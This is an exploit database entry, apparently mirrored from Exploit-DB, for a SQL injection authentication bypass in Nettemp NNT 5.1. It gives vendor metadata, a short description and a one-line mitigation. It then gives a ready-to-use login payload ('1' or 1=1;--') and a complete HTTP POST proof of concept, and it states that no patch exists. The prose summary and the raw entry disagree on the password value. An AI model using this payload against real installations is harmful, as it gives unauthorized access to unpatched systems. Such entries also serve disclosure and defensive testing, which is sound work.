Nettmp NNT 5.1 - SQLi Authentication Bypass

vendor:

NNT

by:

Momen Eldawakhly

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: NNT

Affected Version From: 5.1

Affected Version To: 5.1

Patch Exists: NO

Related CWE:

CPE: a:nettemp:nnt:5.1

Metasploit:

Other Scripts:

Platforms Tested: Linux (Ubuntu 20.04)

2021

Nettmp NNT 5.1 – SQLi Authentication Bypass

An attacker can bypass authentication by sending a crafted username and password in a POST request to the vulnerable application. The username should be set to '1' or 1=1;-- and the password should be set to ", which will bypass the authentication process and allow the attacker to access the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)

Payload:

username: 1' or 1=1;--
password: \

Proof of Concept:

POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1

username=1%27+or+1%3D1%3B--&password=%5C&form_login=log